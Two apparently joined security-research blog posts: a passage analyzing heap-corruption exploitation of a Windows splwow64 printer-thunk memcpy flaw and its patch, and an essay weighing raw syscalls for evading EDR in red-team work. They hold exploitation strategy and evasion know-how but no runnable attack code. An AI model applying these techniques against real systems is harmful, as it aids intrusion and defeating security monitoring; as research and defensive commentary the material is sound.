cookies. This was part of a mitigation added after 0986 as again described by
Kaspersky. Essentially, in order to invoke the other functions available to
splwow64, we need to open a handle to a target printer. Doing this, GDI creates
a cookie for us and stores it in an internal linked list. The cookie is created
by LoadUserModePrinterDriverEx and is of type UMPD:
1234567891011121314
typedef struct _UMPD {
DWORD dwSignature; // data structure signature
struct _UMPD * pNext; // linked list pointer
PDRIVER_INFO_2W pDriverInfo2; // pointer to driver info
HINSTANCE hInst; // instance handle to user-mode printer driver module
DWORD dwFlags; // misc. flags
BOOL bArtificialIncrement; // indicates if the ref cnt has been bumped up to
DWORD dwDriverVersion; // version number of the loaded driver
INT iRefCount; // reference count
struct ProxyPort * pp; // UMPD proxy server
KERNEL_PVOID umpdCookie; // cookie returned back from proxy
PHPRINTERLIST pHandleList; // list of hPrinter's opened on the proxy server
PFN apfn[INDEX_LAST]; // driver function table
} UMPD, *PUMPD;
When a request for a printer action comes in, GDI will check if the request contains a valid printer handle and a cookie for it exists. Conveniently, there’s a function pointer table at the end of the UMPD structure called by a number of LPC functions. By using the pointer to the head of the cookie list, a global variable, we can inspect the list:
This is the first UMPD cookie entry, and we can see its function table contains 5 entries. Conveniently all of these heap addresses are 32-bit.
Unfortunately, none of these functions are called from splwow64 LPC. When processing the LPC requests, the following check is performed on the received buffer:
This effectively limits the functions we can call to 0x6a through 0x74, and the only times the function tables are referenced are prior to 0x6a.
Another strategy I looked at was abusing the fact that request buffers are allocated from the same heap, and thus linear. Essentially, I wanted to see if I could TOCTTOU the buffer by overwriting the memcpy destination after it’s transformed from an offset to an address, but before it’s processed. Since the splwow64 process is disposable and we can crash it as often as we’d like without impacting system stability, it seems possible. After tinkering with heap allocations for awhile, I discovered a helpful primitive.
When a request comes into the LPC server, splwow64 will first allocate a buffer and then copy the request into it:
Notice there are effectively no checks on the message size; this gives us the ability to allocate chunks of arbitrary size. What’s more is that once the request has finished processing, the output is copied back to the memory view and the buffer is released. Since the Windows heap aggressively returns free chunks of same sized requests, we can obtain reliable read/write into another message buffer. Here’s the leaked heap address after several runs:
Since we can only write to addresses ahead of ours, we can use 0xdd9e90 to write into 0x2b43fe0 (offset of 0x1d6a150). Note that these allocations are coming out of the front-end allocator due to their size, but as previously mentioned, we’ve got a lot of control there.
After a few hours and a lot of threads, I abandoned this approach as I was unable to trigger an appropriately timed overwrite. I found a memory leak in the port connection code, but it’s tiny (0x18 bytes) and doesn’t improve the odds, no matter how much pressure I put on the heap. I next attempted to target the message type field; maybe the connection timing was easier to land. Recall that splwow64 restricts the message type we can request. This is because certain message types are considered “privileged”. How privileged, you ask? Well, let’s see what 0x76 does:
A fully controlled memcpy with zero checks on the values passed. If we could gain access to this we could use the old techniques used to exploit this vulnerability.
After rigging up some threads to spray, I quickly identified a crash:
That’s the format of our spray, but you’ll notice it’s crashing during allocation. Basically, the message buffer chunk was freed and we’ve managed to overwrite the freelist chunk’s forward link prior to it being reused. Once our next request comes in, it attempts to allocate a chunk out of this sized bucket and crashes walking the list.
Notably, we can also corrupt a busy chunk’s header, leading to a crash during the free process:
This is an interesting primitive because it grants us full control over a heap chunk, both free and busy, but unlike the browser world, full of its class objects and vtables, our message buffer is flat, already assumed to be untrustworthy. This means we can’t just overwrite a function pointer or modify an object length. Furthermore, the lifespan of the object is quite short. Once the message has been processed and the response copied back to the shared memory region, the chunk is released.
I spent quite a bit of time digging into public work on NT/LF heap exploitation primitives in modern Windows 10, but came up empty. Most work these days focuses on browser heaps and, typically, abusing object fields to gain code execution or AAR/AAW. @scwuaptx[7] has a great paper on modern heap internals/primitives[6] and an example from a CTF in ‘19[5], but ends up using a FILE object to gain r/w which is unavailable here.
While I wasn’t able to take this to full code execution, I’m fairly confident this is doable provided the right heap primitive comes along. I was able to gain full control over a free and busy chunk with valid headers (leaking the heap encoding cookie), but Microsoft has killed all the public techniques, and I don’t have the motivation to find new ones (for now ;P).
The code is available on Github[8], which is based on the public PoC. It uses my technique described above to leak the heap cookie and smash a free chunk’s flink.
Patch
Microsoft patched this in January, just a few weeks after Project Zero FD’d the bug. They added a variety of things to the function, but the crux of the patch now requires a buffer size which is then used as a bounds check before performing memcpy’s.
GdiPrinterThunk now checks if DisableUmpdBufferSizeCheck is set in HKLM\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize. If it’s not, GdiPrinterThunk_Unpatched is used, otherwise, GdiPrinterThunk_Patched. I can only surmise that they didn’t want to break compatibility with…something, and decided to implement a hack while they work on a more complete solution (AppContainer..?). The new GdiPrinterThunk:
12345678910
int GdiPrinterThunk(int MsgBuf, int MsgBufSize, int MsgOut, unsigned int MsgOutSize)
{
int result;
if ( gbIsUmpdBufferSizeCheckEnabled )
result = GdiPrinterThunk_Patched(MsgBuf, MsgBufSize, (__int64 *)MsgOut, MsgOutSize);
else
result = GdiPrinterThunk_Unpatched(MsgBuf, (__int64 *)rval, rval);
return result;
}
Along with the buf size they now also require the return buffer size and check to ensure it’s sufficiently large enough to hold output (this is supplied by the ProxyMsg in splwow64).
And the specific patch for the 0x6d memcpy:
12345678910111213
SrcPtr = **MsgBuf_Off80;
if ( SrcPtr )
{
SizeHigh = SrcPtr[34];
DstPtr = *(void **)(MsgBuf + 88);
dwCopySize = SizeHigh + SrcPtr[35];
if ( DstPtr + dwCopySize <= _BufEnd // ensure we don't write past the end of the MsgBuf
&& (unsigned int)dwCopySize >= SizeHigh // ensure total is at least >= SizeHigh
&& (unsigned int)dwCopySize <= 0x1FFFE ) // sanity check WORD boundary
{
memcpy_0(DstPtr, SrcPtr, v276 + SrcPtr[35]);
}
}
It’s a little funny at first and seems like an incomplete patch, but it’s because Microsoft has removed (or rather, inlined) all of the previous UMPDPointerFromOffset calls. It still exists, but it’s only called from within UMPDStringPointerFromOffset_Patched and now named UMPDPointerFromOffset_Patched. Here’s how they’ve replaced the source offset conversion/check:
1234567891011121314
MCpySrcPtr = (unsigned __int64 *)(MsgBuf + 80);
if ( MsgBuf == -80 )
goto LABEL_380;
MCpySrc = *MCpySrcPtr;
if ( *MCpySrcPtr )
{
// check if the offset is less than the MsgBufSize and if it's at least 8 bytes past the src pointer struct (contains size words)
if ( MCpySrc > (unsigned int)_MsgBufSize || (unsigned int)_MsgBufSize - MCpySrc < 8 )
goto LABEL_380;
// transform offset to pointer
*MCpySrcPtr = MCpySrc + MsgBuf;
}
It seems messier this way, but is probably just compiler optimization. MCpySrc is the address of the source struct, which is:
12345
typedef struct SrcPtr {
DWORD offset;
WORD SizeHigh;
WORD SizeLow;
};
Size is likely split out for additional functionality in other LPC functions, but I didn’t bother figuring out why. The destination offset/pointer is resolved in a similar fashion.
Funny enough, the GdiPrinterThunk_Unpatched really is unpatched; the vulnerable memcpy code lives on.
So over the years I’ve had a number of conversations about the utility of using syscalls in shellcode, C2s, or loaders in offsec tooling and red team ops. For reasons likely related to the increasing maturity of EDRs and their totalitarian grip in enterprise environments, I’ve seen an uptick in projects and blogs championing “raw syscalls” as a technique for evading AV/SIEM technologies. This post is an attempt to describe why I think the technique’s efficacy has been overstated and its utility stretched thin.
This diatribe is not meant to denigrate any one project or its utility; if your tool or payload uses syscalls instead of ntdll, great. The technique is useful under certain circumstances and can be valuable in attempts at evading EDR, particularly when combined with other strategies. What it’s not, however, is a silver bullet. It is not going to grant you any particularly interesting capability by virtue of evading a vendor data sink. Determining its efficacy in context of the execution chain is difficult, ambiguous at best. Your C2 is not advanced in EDR evasion by including a few ntdll stubs.
Note that when I’m talking about EDRs, I’m speaking specifically to modern samples with online and cloud-based machine learning capabilities, both attended and unattended. Crowdstrike Falcon, Cylance, CybeReason, Endgame, Carbon Black, and others have a wide array of ML strategies of varying quality. This post is not an analysis of these vendors’ user mode hooking capabilities.
Finally, this discussion’s perspective is that of post-exploitation, necessary for an attacker to issue a syscall anyway. User mode hooks can provide useful telemetry on user behavior prior to code execution (phishing stages), but once that’s achieved, all bets of process integrity are off.
syscalling
Very briefly, using raw syscalls is an old technique that obviates the need to use sanctioned APIs and instead uses assembly to execute certain functions exposed to user mode from the kernel. For example, if you wanted to read memory of another process, you might use NtReadVirtualMemory:
This function is exported by NTDLL; at runtime, the PE loader loads every DLL in its import directory table, then resolves all of the import address table (IAT) function pointers. When we call NtReadVirtualMemory our pointers are fixed up based on the resolved address of the function, bringing us to execute:
12345678
00007ffb`1676d4f0 4c8bd1 mov r10, rcx
00007ffb`1676d4f3 b83f000000 mov eax, 3Fh
00007ffb`1676d4f8 f604250803fe7f01 test byte ptr [SharedUserData+0x308 (00000000`7ffe0308)], 1
00007ffb`1676d500 7503 jne ntdll!NtReadVirtualMemory+0x15 (00007ffb`1676d505)
00007ffb`1676d502 0f05 syscall
00007ffb`1676d504 c3 ret
00007ffb`1676d505 cd2e int 2Eh
00007ffb`1676d507 c3 ret
This stub, implemented in NTDLL, moves the syscall number (0x3f) into EAX and uses syscall or int 2e, depending on the system bitness, to transition to the kernel. At this point the kernel begins executing the routine tied to code 0x3f. There are plenty of resources on how the process works and what happens on the way back, so pleasereferelsewhere.
Modern EDRs will typically inject hooks, or detours, into the implementation of the function. This allows them to capture additional information about the context of the call for further analysis. In some cases the call can be outright blocked. As a red team, we obviously want to stymie this.
With that, I want to detail a few shortcomings with this technique that I’ve seen in many of the public implementations. Let me once again stress here that I’m not trying to denigrate these tools; they provide utility and have their use cases that cannot be ignored, which I hope to highlight below.
syscall values are not consistent
j00ru maintains the go-to source for both nt and win32k, and by blindly searching around on here you can see the shift in values between functions. Windows 10 alone currently has eleven columns for the different major builds of Win10, some functions shifting 4 or 5 times. This means that we either need to know ahead of time what build the victim is running and tailor the syscall stubs specifically (at worst cumbersome in a post-exp environment), or we need to dynamically generate the syscall number at runtime.
There are several proposed solutions to discovering the syscall at runtime: sorting Zw exports, reading the stubs directly out of the mapped NTDLL, querying j00ru’s Github repository (lol), or actually baking every potential code into the payload and selecting the correct one at runtime. These are all usable options, but everything here is either cumbersome or an unnecessary risk in raising our threat profile with the EDRs ML model.
Let’s say you attempt to read NTDLL off disk to discover the stubs; that requires issuing CreateFile and ReadFile calls, both triggering minifilter and ETW events, and potentially executing already established EDR hooks. Maybe that raises your threat profile a few percentage points, but you’re still golden. You then need to copy that stub out into an executable section, setup the stack/registers, and invoke. Optionally, you could use the already mapped NTDLL; that requires either GetProcAddress, walking PEB, or parsing out the IAT. Are these events surrounding the resolution of the stub more or less likely to increase the threat profile than just calling the NTDLL function itself?
The least-bad option of these is baking the codes into your payload and switching at runtime based on the detection of the system version. In memory this is going to look like an s-box switch, but there are no extraneous calls to in-memory or on-disk files or stumbles up or down the PEB. This is great, but cumbersome if you need to support a range of languages and execution environments, particularly those with on-demand or dynamic requirements.
syscall’s miss useful/critical functionality
In addition to ease of use in C/C++, user mode APIs provide additional functionality prior to hitting the kernel. This could be setting up/formatting arguments, exception or edge-case handling, SxS/activation contexts, etc. Without using these APIs and instead syscalling yourself, you’re missing out on this, for better or for worse. In some cases it means porting that behavior directly to your assembler stub or setting up the environment pre/post execution.
In some cases, like WriteProcessMemory or CreateRemoteThreadEx, it’s more “helpful” than actually necessary. In others, like CreateEnclave or CallEnclave, it’s virtually a requirement. If you’re angling to use only a specific set of functions (NtReadVirtualMemory/NtWriteVirtualMemory/etc) this might not be much of an issue, but expanding beyond that comes with great caveat.
the spooky functions are probably being called anyway
In general, syscalling is used to evade the use of some function known or suspected to be hooked in user mode. In certain scenarios we can guarantee that the syscall is the only way that hooked function is going to execute. In others, however, such as a more feature rich stage 0 or C2, we can’t guarantee this. Consider the following (pseudo-code):
In the above we’ve opened a writable process handle, created a blob of memory, written into it, and started a thread to execute it. A very common process injection strategy. Setting aside the tsunami of information this feeds into the kernel, only dynamic instrumentation of the runtime would detect something like this. Any IAT or inline hooks are evaded.
But say your loader does a few other things, makes a few other calls to user32, dnsapi, kernel32, etc. Do you know that those functions don’t make calls into the very functions you’re attempting to avoid using? Now you could argue that by evading the hooks for more sensitive functionality (process injection), you’ve lowered your threat score with the EDR. This isn’t entirely true though because EDR isn’t blind to your remote thread (PsSetCreateThreadNotifyRoutine) or your writable process handle (ObRegisterCallbacks) or even your cross process memory write. So what you’ve really done is avoided sending contextualized telemetry to the kernel of the cross process injection — is that enough to avoid heightened scrutiny? Maybe.
Additionally, modern EDRs hook a ton of stuff (or at least some do). Most syscall projects and research focus on NTDLL; what about kernel32, user32, advapi32, wininet, etc? None of the syscall evasion is going to work here because, naturally, a majority of those don’t need to syscall into the kernel (or do via other ntdll functions…). For evasion coverage, then, you may need to both bolt on raw syscall support as well as a generic unhooking strategy for the other modules.
syscall’s are partially effective at escaping UM data sinks
Many user mode hooks themselves do not have proactive defense capabilities baked in. By and large they are used to gather telemetry on the call context to provide to the kernel driver or system service for additional analysis. This analysis, paired with what it’s gathered via ETW, kernel mode hooks, and other data sinks, forms a composite picture of the process since birth.
Let’s take the example of cross process code injection referenced above. Let’s also give your loader the benefit of the doubt and assume it’s triggered nothing and emitted little telemetry on its way to execution. When the following is run:
We are firing off a ton of telemetry to the kernel and any listening drivers. Without a single user mode hook we would know:
Process A opened a handle to Process B with X permissions (ObRegisterCallbacks)
Process A allocated memory in Process B with X permissions (EtwTi)
Process A wrote data into Process B VAS (EtwTi)
Process A created a remote thread in Process B (PsSetCreateThreadNotifyRoutine, Etw)
It is true that EtwTi is newish and doesn’t capture everything, hence the partial effectiveness. But that argument grows thin overtime as adoption of the feed grows and the API matures.
A strong argument for syscalls here is that it evades custom data sinks. Up until now we’ve only considered what Microsoft provides, not what the vendor themselves might include in their hook routine, and how that telemetry might influence their agent’s model. Some vendors, for performance reasons, prefer to extract thread information at call time. Some capture all parameters and pack them into more consumable binary blobs for consumption in the kernel. Depending on what exactly the hook does, and its criticality to the bayesian model, this might be a great reason to use them.
your testing isn’t comprehensive or indicative of the general case
This is a more general gripe with some of the conversation on modern EDR evasion. Modern EDRs use a variety of learning heuristics to determine if an unknown binary is malicious or not; sometimes successfully, sometimes not. This model is initially trained on some set of data (depending on the vendor), but continues to grow based on its observations of the environment and data shared amongst nodes. This is generally known as online learning. On large deploys of new EDRs there is typically a learning or passive phase; that allows the model to collect baseline metrics of what is normal and, hopefully, identify anomalies or deviations thereafter.
Effectively then, given a long enough timeline, one enterprise’s agent model might be significantly different from another. This has a few implications. The first being, of course, that your lab environment is not an accurate representation of the client. While your syscall stub might work fine in the lab, unless it’s particularly novel, it’s entirely possible it’s been observed elsewhere.
This also means that pinpointing the reason why your payload works or doesn’t work is a bit of dark art. If your payload with the syscall evasion ends up working in a client environment, does that mean the evasion is successful, or would it have worked regardless of whether you used ntdll or not? If on the other hand your payload was blocked, can you identify the syscalls as the problem? Furthermore, if you add in evasion stubs and successfully execute, can we definitively point to the syscall evasion as the threat score culprit?
At this point, then, it’s a game of risk. You risk allowing the agent’s model to continue aggregating telemetry and improving its heuristic, and thereby the entire network’s model. Repeated testing taints the analysis chain as it grows to identify portions of your code as malicious or not; a fuzzy match, regardless of the function or assembler changes made. You also risk exposing the increased telemetry and details to the cloud which is then in the hands of both automated and manual tooling and analysis. If you disabled this portion, then, you also lack an accurate representation of detection capabilities.
In short, much of the testing we do against these new EDR solutions is rather unscientific. That’s largely a result of our inability to both peer into the state of an agent’s model while also deterministically assessing its capabilities. Testing in a limped state (ie. offline, with cloud connectivity blackholed, etc.) and restarting VMs after every test provides some basic insight but we lose a significant chunk of EDR capability. Isolation is difficult.
anyway
These things, when taken together, motivate my reluctance to embrace the strategy in much of my tooling. I’ve found scant cases in which a raw syscall was preferable to some other technique and I’ve become exhausted by the veracity of some tooling claims. The EDRs today are not the EDRs of our red teaming forefathers; testing is complicated, telemetry insight is improving, and data sets and enterprise security budgets are growing. We’ve got to get better at quantifying and substantiating our tool testing/analysis, and we need to improve the conversation surrounding the technologies.
I have a few brief, unsolicited thoughts for both red teams and EDR vendors based on my years of experience in this space. I’d love to hear others.
for EDR
Do not rely on user mode hooks and, more importantly, do not implicitly trust it. Seriously. Even if you’re monitoring hook integrity from the kernel, there are too many variables and too many opportunities for malicious code to tamper with or otherwise corrupt the hook or the integrity of the incoming data. Consider this from a performance perspective if you need to. I know you think you’re being cute by:
Monitoring your hot patches for modification
Encrypting telemetry
Transmitting telemetry via clandestine/obscure methods (I see you NtQuerySystemInformation)
“Validating” client processes
The fact is anything emitted from an unsigned, untrusted, user mode process can be corrupted. Put your efforts into consuming ETW and registering callbacks on all important routines, PPL’ing your user mode services, and locking down your IPC and general communication channels. Consume AMSI if you must, with the same caveat as user mode hooks: it is a data sink, and not necessarily one of truth.
The more you can consume in the kernel (maybe a trustlet some day?), the more difficult you are to tamper with. There is of course the ability for red team to wormhole into the kernel and attack your driver, but this is another hurdle for an attacker to leap, and yet another opportunity to catch them.
for red team
Using raw syscalls is but a small component of a greater system — evasion is less a set of techniques and more a system of behaviors. Consider that the hooks themselves are not the problem, but rather what the hooks do. I had to edit myself several times here to not reference the spoon quote from the Matrix, but it’s apt, if cliche.
There are also more effective methods of evading user mode hooks than raw syscalling. I’ve discussed some of them publicly in the past, but urge you to investigate the machinations of the EDR hooks themselves. I’d argue even IAT/inline unhooking is more effective, in some cases.
Cloud capabilities are the truly scary expansion. Sample submission, cloud telemetry aggregation and analysis, and manual/automatic hunting services change the landscape of threat analysis. Not only can your telemetry be correlated or bolstered amongst nodes, it can be retroactively hunted and analyzed. This retroactive capability, often provided by backend automation or threat hunting teams (hi Overwatch!) can be quite effective at improving an enterprises agent models. And not only one enterprises model; consider the fact that these data points are shared amongst all vendor subscribers, used to subsequently improve those agent models. Burning a technique is no longer isolated to a technology or a client.